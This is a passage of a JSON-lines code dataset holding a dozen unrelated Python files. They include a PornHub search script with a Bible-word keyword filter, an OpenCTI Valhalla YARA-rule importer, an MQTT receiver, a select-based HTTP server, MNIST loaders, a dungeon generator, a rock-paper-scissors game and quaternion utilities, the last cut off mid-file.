pornhub\r\n\r\n\r\nallowableWords = set()\r\nwith open(\"the-king-james-bible.txt\", \"r\") as f:\r\n allTheLines = f.readlines()\r\n for line in allTheLines:\r\n words = line.split(\" \")\r\n for word in words:\r\n allowableWords.add(word)\r\n\r\ndef getKeyWords():\r\n print(\"type all your keywords seperated by a space\")\r\n keywords = input().split(\" \")\r\n\r\n hasBadWords = False\r\n badWords = []\r\n for keyword in keywords:\r\n if keyword not in allowableWords:\r\n hasBadWords = True\r\n badWords.append(keyword)\r\n\r\n if hasBadWords:\r\n print(\"{}! That word is not approved by Jesus! Try again \\n\\n\\n\\n\\n\".format(\", \".join(badWords).title())) \r\n keywords = getKeyWords()\r\n \r\n return keywords\r\n#client = pornhub.PornHub(\"5.135.164.72\", 3128, search_keywords)\r\n#With proxy, given a Proxy IP and Port. For the countries with restricted access like Turkey, etc.\r\nsearch_keywords = getKeyWords()\r\nprint(search_keywords)\r\nclient = pornhub.PornHub(search_keywords)\r\n \r\nfor video in client.getVideos(quantity=10):\r\n print(video[\"name\"])\r\n print(video[\"url\"])\r\n print()","sub_path":"kingJamesTest.py","file_name":"kingJamesTest.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"85768240","text":"import numpy as np\nanlist = [0,1,3,1,1,4,1]\nlandlist = [2,3,4,1,1,1,1]\nanlist = np.array(anlist)\nlandlist = np.array(landlist)\nventetid = 0 \n#venteliste = []\n\n# cumsum af lister\ncum_landlist = np.cumsum(landlist)\ncum_anlist = np.cumsum(anlist)\n\nfor i in range(len(landlist)):\n if i > 0:\n if cum_anlist[i] < cum_landlist[i-1]:\n ventetid = ventetid+ cum_landlist[i-1]-cum_anlist[i]\n# venteliste.append(ventetid)\n# ventetid = 0\n else:\n ventetid = ventetid\nprint(ventetid)\n\n\n\"\"\"\nDette skulle gerne fungere!!!\n\nNår vi er HELT færdige med koden kunne det være en ide at omskrive det til\nsamme type kode som vores anden for løkke, der laver de randomtider.\nAltså sætte de to arrays sammen og bruge enumerate funktionen.\n\n\"\"\"","sub_path":"Python/MODSIM - Miniprojekt/Trash.py","file_name":"Trash.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"148602590","text":"# 整型变量\na = 100\n# 浮点型变量\nb = 100.0\n# 字符串\nc = 'wxl'\nprint(a, b, c)\n#没有类型定义关键字,根据赋初始值来确定变量类型\n\nd=1.23\n\n#变量测试\n\n#多个变量多重赋值\ne = f = g = 100\nprint(e, f, g)\n\n#多元赋值\nh, i, j = 100, 100.0, 'wxl'\nprint(h, i, j)\n\n#查询变量类型函数:type()\n#内置的 type() 函数可以用来查询变量所指的对象类型。\na = 1000\nprint(type(a))\n\n#判断对象类型函数:isinstance()\n\na = 1000\nprint(isinstance(a, int))\n\n#两者区别\n#type() 不会认为子类是一种父类类型;\n#isinstance() 会认为子类是一种父类类型。","sub_path":"Test_2.py","file_name":"Test_2.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"211768634","text":"import torch\nfrom torch.utils.data import Dataset\n\nfrom .stereo_dataset import StereoDataset\nfrom .dexter_object import DexterObjectDataset\n\n\nclass MixedDataset(Dataset):\n def __init__(self, config):\n \n self.Stereo = StereoDataset({'path': config['path_stereo'], \n 'augment': config['augment'],\n 'scope': config['scope']})\n \n self.DexterObject = DexterObjectDataset({'path': config['path_dexter'], \n 'augment': config['augment'],\n 'scope': config['scope']})\n \n self.len_Stereo = self.Stereo.__len__()\n self.len_DexterObject = self.DexterObject.__len__()\n \n\n def __getitem__(self, idx):\n\n if idx < self.len_Stereo:\n return self.Stereo.__getitem__(idx)\n else:\n return self.DexterObject.__getitem__(idx-self.len_Stereo)\n\n \n def __len__(self):\n return self.len_Stereo + self.len_DexterObject\n\n \n \n","sub_path":"dataset/mixed_dataset_real.py","file_name":"mixed_dataset_real.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"334699712","text":"# -*- coding: utf-8 -*-\n\"\"\"OpenCTI Valhalla Knowledge importer module.\"\"\"\n\nimport re\nfrom datetime import datetime\nfrom typing import Any, Dict, List, Mapping, Optional\nfrom urllib.parse import urlparse\n\nfrom .models import ApiResponse\n\nfrom pycti.connector.opencti_connector_helper import OpenCTIConnectorHelper\nfrom stix2 import TLP_WHITE, TLP_GREEN, TLP_AMBER, TLP_RED\n\n\nclass KnowledgeImporter:\n \"\"\"Valhalla Knowledge importer.\"\"\"\n\n _GUESS_NOT_A_MALWARE = \"GUESS_NOT_A_MALWARE\"\n _GUESS_NOT_A_ACTOR = \"GUESS_NOT_A_ACTOR\"\n _KNOWLEDGE_IMPORTER_STATE = \"knowledge_importer_state\"\n _TLP_MAPPING = {\n \"tlp_white\": \"TLP_WHITE\",\n \"tlp_green\": \"TLP_GREEN\",\n \"tlp_amber\": \"TLP_AMBER\",\n \"tlp_red\": \"TLP_RED\",\n }\n\n def __init__(\n self,\n helper: OpenCTIConnectorHelper,\n confidence_level: int,\n update_data: bool,\n default_marking,\n valhalla_client: str,\n ) -> None:\n \"\"\"Initialize Valhalla indicator importer.\"\"\"\n self.helper = helper\n self.guess_malware = True\n self.guess_actor = True\n self.confidence_level = confidence_level\n self.update_data = update_data\n self.default_marking = default_marking\n self.valhalla_client = valhalla_client\n self.malware_guess_cache: Dict[str, str] = {}\n self.actor_guess_cache: Dict[str, str] = {}\n self.date_utc = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S+00:00\")\n self.organization = helper.api.identity.create(\n name=\"Nextron Systems GmbH\",\n type=\"Organization\",\n description=\"THOR APT scanner and Valhalla Yara Rule API Provider\",\n )\n\n def run(self, state: Mapping[str, Any]) -> Mapping[str, Any]:\n \"\"\"Run importer.\"\"\"\n self.helper.log_info(\"running Knowledge importer with state: \" + str(state))\n\n self._load_opencti_tlp()\n self._process_rules()\n\n state_timestamp = datetime.utcnow().timestamp()\n self.helper.log_info(\"knowledge importer completed\")\n return {self._KNOWLEDGE_IMPORTER_STATE: state_timestamp}\n\n def _process_rules(self) -> None:\n try:\n rules_json = self.valhalla_client.get_rules_json()\n response = ApiResponse.parse_obj(rules_json)\n except Exception as err:\n self.helper.log_error(f\"error downloading rules: {err}\")\n return None\n\n for yr in response.rules:\n try:\n indicator = self.helper.api.indicator.create(\n name=yr.name,\n description=yr.cti_description,\n pattern_type=\"yara\",\n indicator_pattern=yr.content,\n markingDefinitions=[self.default_marking[\"id\"]],\n main_observable_type=\"File-SHA256\",\n createdByRef=self.organization[\"id\"],\n valid_from=yr.cti_date,\n score=yr.score,\n update=self.update_data,\n detection=True,\n )\n except Exception as err:\n self.helper.log_error(f\"error creating indicator: {err}\")\n\n self._add_refs_for_id([yr.reference], indicator[\"id\"])\n self._add_tags_for_indicator(yr.tags, indicator[\"id\"])\n\n def _add_tags_for_indicator(self, tags: list, indicator_id: str) -> None:\n for tag in tags:\n # We skip on tags with MITRE ids for now\n if re.search(r\"^\\D\\d{4}$\", tag):\n continue\n # Create Hygiene Tag\n tag_valhalla = self.helper.api.tag.create(\n tag_type=\"Valhalla\", value=tag, color=\"#46beda\",\n )\n self.helper.api.stix_entity.add_tag(\n id=indicator_id, tag_id=tag_valhalla[\"id\"]\n )\n\n def _add_refs_for_id(self, refs: list, obj_id: str) -> None:\n if refs == {} or obj_id == \"\":\n return None\n\n for ref in refs:\n if ref == \"-\":\n continue\n try:\n san_url = urlparse(ref)\n except Exception:\n self.helper.log_error(f\"error parsing ref url: {ref}\")\n continue\n\n reference = self.helper.api.external_reference.create(\n source_name=\"Nextron Systems Valhalla API\",\n url=san_url.geturl(),\n description=\"Rule Reference: \" + san_url.geturl(),\n )\n self.helper.api.stix_entity.add_external_reference(\n id=obj_id, external_reference_id=reference[\"id\"],\n )\n\n def _guess_malwares_from_tags(self, tags: List[str]) -> Mapping[str, str]:\n if not self.guess_malware:\n return {}\n\n malwares = {}\n\n for tag in tags:\n if not tag:\n continue\n guess = self.malware_guess_cache.get(tag)\n if guess is None:\n guess = self._GUESS_NOT_A_MALWARE\n\n id = self._fetch_malware_id_by_name(tag)\n if id is not None:\n guess = id\n\n self.malware_guess_cache[tag] = guess\n\n if guess == self._GUESS_NOT_A_MALWARE:\n self.helper.log_info(f\"Tag '{tag}'' does not reference malware\")\n else:\n self.helper.log_info(f\"Tag '{tag}' references malware '{guess}'\")\n malwares[tag] = guess\n return malwares\n\n def _guess_actor_from_tags(self, tags: List[str]) -> Mapping[str, str]:\n if not self.guess_actor:\n return {}\n\n actors = {}\n\n for tag in tags:\n if not tag:\n continue\n guess = self.actor_guess_cache.get(tag)\n if guess is None:\n guess = self._GUESS_NOT_A_ACTOR\n\n id = self._fetch_actor_id_by_name(tag)\n if id is not None:\n guess = id\n\n self.actor_guess_cache[tag] = guess\n\n if guess == self._GUESS_NOT_A_ACTOR:\n self.helper.log_info(f\"Tag '{tag}' does not reference actor\")\n else:\n self.helper.log_info(f\"Tag '{tag}' references actor '{guess}'\")\n actors[tag] = guess\n return actors\n\n def _fetch_malware_id_by_name(self, name: str) -> Optional[str]:\n if name == \"\":\n return None\n filters = [\n self._create_filter(\"name\", name),\n self._create_filter(\"alias\", name),\n ]\n for fil in filters:\n malwares = self.helper.api.malware.list(filters=fil)\n if malwares:\n if len(malwares) > 1:\n self.helper.log_info(f\"More then one malware for '{name}'\")\n malware = malwares[0]\n return malware[\"id\"]\n return None\n\n def _fetch_actor_id_by_name(self, name: str) -> Optional[str]:\n if name == \"\":\n return None\n filters = [\n self._create_filter(\"name\", name),\n self._create_filter(\"alias\", name),\n ]\n for fil in filters:\n actors = self.helper.api.threat_actor.list(filter=fil)\n if actors:\n if len(actors) > 1:\n self.helper.log_info(f\"More then one actor for '{name}'\")\n actor = actors[0]\n return actor[\"id\"]\n return None\n\n @staticmethod\n def _create_filter(key: str, value: str) -> List[Mapping[str, Any]]:\n return [{\"key\": key, \"values\": [value]}]\n\n def _load_opencti_tlp(self):\n self._TLP_MAPPING[\"tlp_white\"] = self.helper.api.marking_definition.read(\n id=TLP_WHITE[\"id\"]\n )\n self._TLP_MAPPING[\"tlp_green\"] = self.helper.api.marking_definition.read(\n id=TLP_GREEN[\"id\"]\n )\n self._TLP_MAPPING[\"tlp_amber\"] = self.helper.api.marking_definition.read(\n id=TLP_AMBER[\"id\"]\n )\n self._TLP_MAPPING[\"tlp_red\"] = self.helper.api.marking_definition.read(\n id=TLP_RED[\"id\"]\n )\n","sub_path":"valhalla/src/valhalla/knowledge.py","file_name":"knowledge.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326574980","text":"#-------------------------------------------------------------------------------\n# Name: module1\n# Purpose:\n#\n# Author: Karanjot\n#\n# Created: 26/04/2017\n# Copyright: (c) Karanjot 2017\n# Licence: \n#-------------------------------------------------------------------------------\nfrom graphics import *\ndef main():\n print(\"This program creates 2 circles using clones\")\n win = GraphWin(\"clones\")\n leftEye = Circle(Point(80,50), 5)\n leftEye.setFill(\"yellow\")\n leftEye.setOutline(\"red\")\n rightEye = leftEye.clone() # rightEye is an exact copy of the left. can't do rightEye = leftEye\n rightEye.move(20,0)\n leftEye.draw(win)\n rightEye.draw(win)\nmain()","sub_path":"program creates 2 circles with clone.py","file_name":"program creates 2 circles with clone.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320774284","text":"import logging\nimport threading\n\nimport paho.mqtt.client as paho_mqtt_client\n\nfrom settings import Settings\nfrom mqtt_message import MqttMessage\n\n\nclass MqttReceiver(threading.Thread):\n \"\"\" Class that offers the possibility to receive mqtt messages. \"\"\"\n\n def __init__(self, topic):\n \"\"\"\n Constructor that initializes necessary\n variables for mqtt connection.\n\n :param topic: topic that gets handled by this receiver thread\n \"\"\"\n super(MqttReceiver, self).__init__(name=\"MqttReceiverThread-\"+str(topic))\n\n self.topic = topic\n\n self._stop = threading.Event()\n self.message_list = []\n self.mqtt_client = paho_mqtt_client.Client()\n self.mqtt_client.on_connect = self.on_connect\n self.mqtt_client.on_disconnect = self.on_disconnect\n self.mqtt_client.on_message = self.on_message\n\n def stop(self):\n \"\"\"\n Sets the internal stop event to\n request the thread stopping.\n \"\"\"\n logging.debug(\"Calling stop on: \"+self.name)\n self._stop.set()\n\n def stopped(self):\n \"\"\"\n Returns whether the internal\n stop event is set.\n \"\"\"\n return self._stop.is_set()\n\n def run(self):\n \"\"\"\n Thread starting method that connects the\n receiver and starts the necessary loops.\n Stops and disconnects if the internal\n stop event is set.\n \"\"\"\n logging.info('MQTT receiver for ' + str(self.topic) + ' started.')\n self.mqtt_client.connect(Settings.mqtt_broker_host, Settings.mqtt_port)\n self.mqtt_client.loop_start()\n\n while not self.stopped():\n pass\n\n self.mqtt_client.loop_stop(force=True)\n self.mqtt_client.disconnect()\n logging.info('MQTT receiver for ' + str(self.topic) + ' stopped.')\n\n def on_connect(self, mqttc, userdata, flags, rc):\n \"\"\" Subsribes to the topic and prints a log message on connecting. \"\"\"\n self.mqtt_client.subscribe(self.topic, Settings.mqtt_qos)\n logging.info('MQTT receiver for ' + str(self.topic) + ' connected with result code ' + str(rc))\n\n def on_disconnect(self, client, userdata, rc):\n \"\"\" Prints a log message on disconnecting. \"\"\"\n logging.info('MQTT receiver for ' + str(self.topic) + ' disconnected with result code ' + str(rc))\n\n def on_message(self, client, userdata, message):\n \"\"\"\n Prints a log message if a message is received\n and adds the message as a mqtt_message object\n to the message_list.\n \"\"\"\n logging.debug('MQTT receiver for ' + str(self.topic) + ' got message: ' + str(message.payload))\n self.message_list.append(MqttMessage(topic=self.topic, payload=message.payload, qos=message.qos))\n\n def pop(self):\n \"\"\"\n Pops the first (oldest) element from\n the message list and returns it.\n \"\"\"\n if self.message_list:\n return self.message_list.pop(0)\n","sub_path":"mqtt_receiver.py","file_name":"mqtt_receiver.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"534182945","text":"#!/usr/bin/env python3\n\nimport math\nimport random\n\nclass Dungeon_Generator():\n\n\tROOM_SIZE_MEAN = 7\n\tROOM_SIZE_VAR = 2\n\n\tdef __init__(self, seed, size):\n\t\trandom.seed(seed)\n\t\tself.seed = seed\n\t\tself.size = size\n\t\tself.dungeon = size * [None]\n\t\tfor i in range(0, size):\n\t\t\tself.dungeon[i] = size * [False]\n\t\tself.rooms = []\n\n\tdef generate_dungeon(self):\n\t\twhile len(self.rooms) < 10:\n\t\t\tself._generate_room(1)\n\n\tdef _generate_room(self, size):\n\t\twidth = 0\n\t\twhile width < 2:\n\t\t\twidth = math.floor(random.gauss(Dungeon_Generator.ROOM_SIZE_MEAN, Dungeon_Generator.ROOM_SIZE_VAR))\n\t\theight = 0\n\t\twhile height < 2:\n\t\t\theight = math.floor(random.gauss(Dungeon_Generator.ROOM_SIZE_MEAN, Dungeon_Generator.ROOM_SIZE_VAR))\n\t\tx = random.randint(0, self.size - width)\n\t\ty = random.randint(0, self.size - height)\n\t\tif self._area_is_clear(x-1, y-1, width+2, height+2):\n\t\t\tself._mark_area(x, y, width, height, True)\n\t\t\tself.rooms.append((x, y, width, height))\n\t\t\treturn True\n\t\treturn False\n\n\tdef _mark_area(self, x, y, width, height, mark):\n\t\tfor i in range(y, y + height):\n\t\t\tfor j in range(x, x + width):\n\t\t\t\tself.dungeon[i][j] = mark\n\n\tdef _area_is_clear(self, x, y, width, height):\n\t\treturn (x >= 0 and\n\t\t\t\ty >= 0 and\n\t\t\t\tx + width < len(self.dungeon) and\n\t\t\t\ty + height < len(self.dungeon) and\n\t\t\t\tnot any(any(row) for row in self._extract(x, y, width, height)))\n\n\tdef _extract(self, x, y, width, height):\n\t\treturn [(row[x:x+width]) for row in self.dungeon[y:y+height]]\n\n\tdef print_dungeon(self, dungeon=None):\n\t\tif not dungeon:\n\t\t\tdungeon = self.dungeon\n\t\tprint(\"\\n\".join(\"\".join((\" \" if cell else \"**\") for cell in row) for row in dungeon))\n\nif __name__ == \"__main__\":\n\ta = [[False, False, True],\n\t [False, True, False],\n\t [False, False, False]]\n\tdg = Dungeon_Generator(random.random(), 30)\n\t# dg = Dungeon_Generator(, 50)\n\tdg.generate_dungeon()\n\tdg.print_dungeon()\n\t# print(dg.seed)\n","sub_path":"dungen.py","file_name":"dungen.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362779727","text":"import select\nimport socket\nimport sys\nimport queue\n\nport = int(sys.argv[1])\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #the accept socket\ns.setblocking(0)\n\ns.bind((socket.gethostname(), port))\ns.listen(5)\n\nread_list = [s]\nwrite_list = []\nmessage_queues = {}\n\nwhile True:\n readable, writable, exceptional = select.select(read_list, write_list, read_list)\n #Note: This code, as well as several other parts of this script, were taken from https://pymotw.com/3/select/\n\n for readable_socket in readable:\n if readable_socket is s:\n clientSock, clientAddr = s.accept()\n clientSock.setblocking(0)\n read_list.append(clientSock)\n message_queues[clientSock] = queue.Queue()\n else:\n fullRequest = readable_socket.recv(4096).decode()\n if fullRequest: #got data\n if readable_socket not in write_list:\n write_list.append(readable_socket)\n\n header = {}\n firstLine = fullRequest.split('\\n')[0].split(' ')\n header['HTTP-Command'] = firstLine[0]\n header['Path'] = firstLine[1]\n header['HTTP-Type'] = firstLine[2]\n for line in fullRequest.split('\\n\\r\\n')[0].split('\\n'):\n if ':' in line:\n x, y = line.split(':', 1)\n header[x] = y.strip()\n\n if len(fullRequest) == 4096:\n try:\n while len(fullRequest) < int(header['Content-Length']):\n request = clientSock.recv(4096) # recieve the request with max of 4096 bits(?) at once\n fullRequest += request.decode()\n except Exception as e:\n while True:\n request = clientSock.recv(4096)\n fullRequest += request.decode()\n if len(request.decode()) < 4096:\n break\n\n\n # Controlling all the request stuff here, pretty self explanatory\n if header['HTTP-Command'] != 'GET':\n fullResponse = 'HTTP/1.1 400 Bad Request\\r\\nContent-Length: 0\\r\\nContent-Type: text/html\\r\\n\\r\\n'\n elif not (header['Path'][-4:] == '.htm' or header['Path'][-5:] == '.html'):\n fullResponse = 'HTTP/1.1 403 Forbidden\\r\\nContent-Length: 0\\r\\nContent-Type: text/html\\r\\n\\r\\n'\n else:\n try:\n file = open(header['Path'][1:], 'r')\n response = file.read()\n file.close()\n\n responselength = len(response)\n responsetype = 'text/html'\n exit_code = '200 OK'\n except Exception as e:\n response = ''\n responselength = 0\n responsetype = 'text/html'\n exit_code = '404 Not Found'\n\n fullResponse = 'HTTP/1.1 ' + exit_code + '\\r\\nContent-Length: ' + str(responselength) + '\\r\\nContent-Type: ' + responsetype +'\\r\\n\\r\\n' + response\n message_queues[readable_socket].put(fullResponse)\n else: #didn't get data\n if readable_socket in write_list:\n write_list.remove(readable_socket)\n read_list.remove(readable_socket)\n readable_socket.close()\n del message_queues[readable_socket]\n\n for writable_socket in writable:\n try:\n next_message = message_queues[writable_socket].get_nowait()\n writable_socket.send(next_message.encode())\n except queue.Empty:\n write_list.remove(writable_socket)\n\n for exceptional_socket in exceptional:\n if exceptional_socket in write_list:\n write_list.remove(exceptional_socket)\n read_list.remove(exceptional_socket)\n exceptional_socket.close()\n del message_queues[exceptional_socket]\n","sub_path":"http_server2_incomplete.py","file_name":"http_server2_incomplete.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462955453","text":"# coding utf-8\nimport gzip\nimport os\n\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef batch_generator(X, y, batch_size=32, shuffle=True):\n n_data = len(X)\n index = np.arange(len(y))\n if shuffle:\n np.random.shuffle(index)\n for ii in range(0, n_data, batch_size):\n if n_data - ii < batch_size:\n features = X[index[ii:]]\n targets = y[index[ii:]]\n else:\n features = X[index[ii : ii + batch_size]]\n targets = y[index[ii : ii + batch_size]]\n yield features, targets\n\n\nclass mnist_dataset:\n def __init__(self, dir_path):\n\n assert os.path.exists(dir_path), \"Arguments error: dir_path does not exist\"\n\n # store path of the data directory\n self.dir_path = dir_path + os.sep\n # define file name\n self.ftrain_feature = self.dir_path + os.path.sep + \"train-images-idx3-ubyte.gz\"\n self.ftrain_labels = self.dir_path + os.path.sep + \"train-labels-idx1-ubyte.gz\"\n self.ftest_features = self.dir_path + os.path.sep + \"t10k-images-idx3-ubyte.gz\"\n self.ftest_labels = self.dir_path + os.path.sep + \"t10k-labels-idx1-ubyte.gz\"\n\n for path in [\n self.ftrain_feature,\n self.ftrain_labels,\n self.ftest_features,\n self.ftest_labels,\n ]:\n print(path)\n assert os.path.exists(path), \"File error: \" + path + \" does not exist\"\n\n def load(self):\n X_train = self.load_features(self.ftrain_feature)\n X_test = self.load_features(self.ftest_features)\n y_train = self.load_labels(self.ftrain_labels)\n y_test = self.load_labels(self.ftest_labels)\n\n # one-hot encoding\n y_train = self.one_hot_encoding(y_train)\n y_test = self.one_hot_encoding(y_test)\n\n # normalize\n X_train = X_train / 255.0\n X_test = X_test / 255.0\n\n return X_train, X_test, y_train, y_test\n\n def load_features(self, file_path):\n \"\"\"Load images as 1D array\"\"\"\n with gzip.open(file_path, \"rb\") as f:\n features = np.frombuffer(f.read(), dtype=np.uint8, offset=16)\n return features.reshape(-1, 28 * 28)\n\n def load_labels(self, file_path):\n \"\"\"Load labels as 1D array\"\"\"\n with gzip.open(file_path, \"rb\") as f:\n labels = np.frombuffer(f.read(), dtype=np.uint8, offset=8)\n return labels\n\n def one_hot_encoding(self, y):\n \"\"\"Convert binary labels into one-hot encoding\"\"\"\n y = y.reshape(1, -1)\n y = y.transpose()\n encoder = OneHotEncoder()\n return encoder.fit_transform(y).toarray()\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406018824","text":"from django.conf.urls import patterns, url\nfrom django.contrib.auth.views import logout as logout_view\nfrom battleshipapp import views\n\nurlpatterns = patterns('',\n\n\turl(r'^$', views.index, name='index' ),\n\turl(r'^/$', views.index, name='index' ),\n url(r'^login/$', views.user_login, name='login'),\n url(r'^logout/$', logout_view, {'next_page': '/' }),\n \n\n url(r'games/$', views.BattleshipGameList.as_view() ),\n url(r'games/(?P[0-9]+)$', views.BattleshipGame.as_view() ),\n\n url(r'player$', views.PlayerView.as_view() ),\n)","sub_path":"battleshipapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"369843988","text":"import random\r\n\r\ndef validate(hand):\r\n if hand < 0 or hand > 2:\r\n return False\r\n else:\r\n return True\r\n\r\ndef handshape(hand, name):\r\n hands = ['Rock', 'Paper', 'Scissors']\r\n print(name + ' picked: ' + hands[hand])\r\n\r\ndef battle(player, computer):\r\n if player == computer:\r\n return 'Draw'\r\n elif player == 0 and computer == 1:\r\n return 'You Lose...'\r\n elif player == 1 and computer == 2:\r\n return 'You Lose...'\r\n elif player == 2 and computer == 0:\r\n return 'You Lose...'\r\n else:\r\n return 'You Win!!'\r\n\r\ndef main():\r\n print(\r\n \"\"\"\r\n \\n \\U0000270A \\U0001F590 \\U0000270C ====== WELCOME TO JANKENPON GAME ====== \\U0000270C \\U0001F590 \\U0000270A\r\n \"\"\")\r\n player_name = input('Please enter your name: ')\r\n\r\n print('\\nPick a hand: (0: Rock, 1: Paper, 2: Scissors)')\r\n\r\n player_handshape = None\r\n while True:\r\n try:\r\n player_handshape = int(input('Please enter a number (0-2): '))\r\n except ValueError:\r\n print('Please input valid number')\r\n continue\r\n else:\r\n break\r\n\r\n if validate(player_handshape):\r\n computer_handshape = random.randint(0, 2)\r\n print('\\n')\r\n handshape(player_handshape, player_name)\r\n handshape(computer_handshape, 'Computer')\r\n result = battle(player_handshape, computer_handshape)\r\n print('\\nResult: ' + result)\r\n\r\n else:\r\n while True:\r\n print(\"Please input valid number\")\r\n while True:\r\n try:\r\n player_handshape = int(input('Please enter a number (0-2): '))\r\n except ValueError:\r\n print('Please input valid number')\r\n continue\r\n else:\r\n break\r\n if validate(player_handshape):\r\n computer_handshape = random.randint(0, 2)\r\n print('\\n')\r\n handshape(player_handshape, player_name)\r\n handshape(computer_handshape, 'Computer')\r\n result = battle(player_handshape, computer_handshape)\r\n print('\\nResult: ' + result)\r\n break\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\nwhile True:\r\n while True:\r\n again = str(input('Play again? (y/n): '))\r\n if again in ('y', 'n'):\r\n break\r\n print('Invalid input')\r\n if again == 'y':\r\n main()\r\n else:\r\n print('\\nThank you for playing JANKENPON game!')\r\n print('See you later!')\r\n break\r\n","sub_path":"jankenpon.py","file_name":"jankenpon.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"77485357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 13:31:58 2019\n\n\"\"\"\n\n# Copyright (c) 2018-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n#\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom numpy.random import RandomState\nfrom scipy.stats import chi\n#import sys\n#from quat_ops import *\n#import torch_autograd_solver as S\n#import quat_ops\n#from torch_batch_svd import batch_svd\n\n# PyTorch-backed implementations\n\ndef qmul(q, r):\n \"\"\"\n Multiply quaternion(s) q with quaternion(s) r.\n Expects two equally-sized tensors of shape (*, 4), where * denotes any number of dimensions.\n Returns q*r as a tensor of shape (*, 4).\n \"\"\"\n assert q.shape[-1] == 4\n assert r.shape[-1] == 4\n\n original_shape = q.shape\n\n # Compute outer product\n terms = torch.bmm(r.contiguous().view(-1, 4, 1), q.contiguous().view(-1, 1, 4))\n\n w = terms[:, 0, 0] - terms[:, 1, 1] - terms[:, 2, 2] - terms[:, 3, 3]\n x = terms[:, 0, 1] + terms[:, 1, 0] - terms[:, 2, 3] + terms[:, 3, 2]\n y = terms[:, 0, 2] + terms[:, 1, 3] + terms[:, 2, 0] - terms[:, 3, 1]\n z = terms[:, 0, 3] - terms[:, 1, 2] + terms[:, 2, 1] + terms[:, 3, 0]\n return torch.stack((w, x, y, z), dim=1).view(original_shape)\n\ndef qrotv(q, v):\n \"\"\"\n Rotate vector(s) v about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3) for v,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 3).\n \"\"\"\n assert q.shape[-1] == 4\n assert v.shape[-1] == 3\n assert q.shape[:-1] == v.shape[:-1]\n\n original_shape = list(v.shape)\n q = q.view(-1, 4)\n v = v.view(-1, 3)\n\n qvec = q[:, 1:]\n uv = torch.cross(qvec, v, dim=1)\n uuv = torch.cross(qvec, uv, dim=1)\n return (v + 2 * (q[:, :1] * uv + uuv)).view(original_shape)\n\n\ndef qrotv3(q, v):\n \"\"\"\n Rotate vector(s) v about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 3) for v,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 3).\n \"\"\"\n assert q.shape[-1] == 4\n assert v.shape[-1] == 3\n assert q.shape[:-1] == v.shape[:-1]\n\n original_shape = list(v.shape)\n q = q.view(-1, 4)\n v = v.view(-1, 3)\n\n # Compute outer product\n terms = torch.bmm(q.view(-1, 4, 1), q.view(-1, 1, 4))\n b2=terms[:,1,1]\n c2=terms[:,2,2]\n d2=terms[:,3,3]\n ab=terms[:,0,1]\n ac=terms[:,0,2]\n ad=terms[:,0,3]\n bc=terms[:,1,2]\n bd=terms[:,1,3]\n cd=terms[:,2,3]\n\n\n qvec_x=[1-2*c2-2*d2, 2*bc-2*ad, 2*ac+2*bd]\n qvec_y=[2*bc+2*ad, 1-2*b2-2*d2, 2*cd-2*ab]\n qvec_z=[2*bd-2*ac, 2*ab+2*cd, 1-2*b2-2*c2]\n qvec=torch.stack((torch.stack(qvec_x, dim=1), torch.stack(qvec_y, dim=1), torch.stack(qvec_z, dim=1)), dim=1)\n\n return torch.bmm(qvec,v.unsqueeze(-1)).view(original_shape)\n\n\n\ndef qrotq(q, p):\n \"\"\"\n Rotate quaternion(s) p about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 4) for p,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 4).\n \"\"\"\n# assert q.shape[-1] == 4\n# assert p.shape[-1] == 4\n# assert q.shape[:-1] == p.shape[:-1]\n\n original_shape = list(p.shape)\n q = q.view(-1, 4)\n p = p.view(-1, 4)\n pw=p[:,0]\n pv=p[:,1:4]\n\n qvec = q[:, 1:]\n uv = torch.cross(qvec, pv, dim=1)\n uuv = torch.cross(qvec, uv, dim=1)\n\n pv=(pv + 2 * (q[:, :1] * uv + uuv))\n\n# return (pv + 2 * (q[:, :1] * uv + uuv)).view(original_shape)\n return torch.cat((pw.unsqueeze(-1), pv), dim=1).view(original_shape)\n\ndef 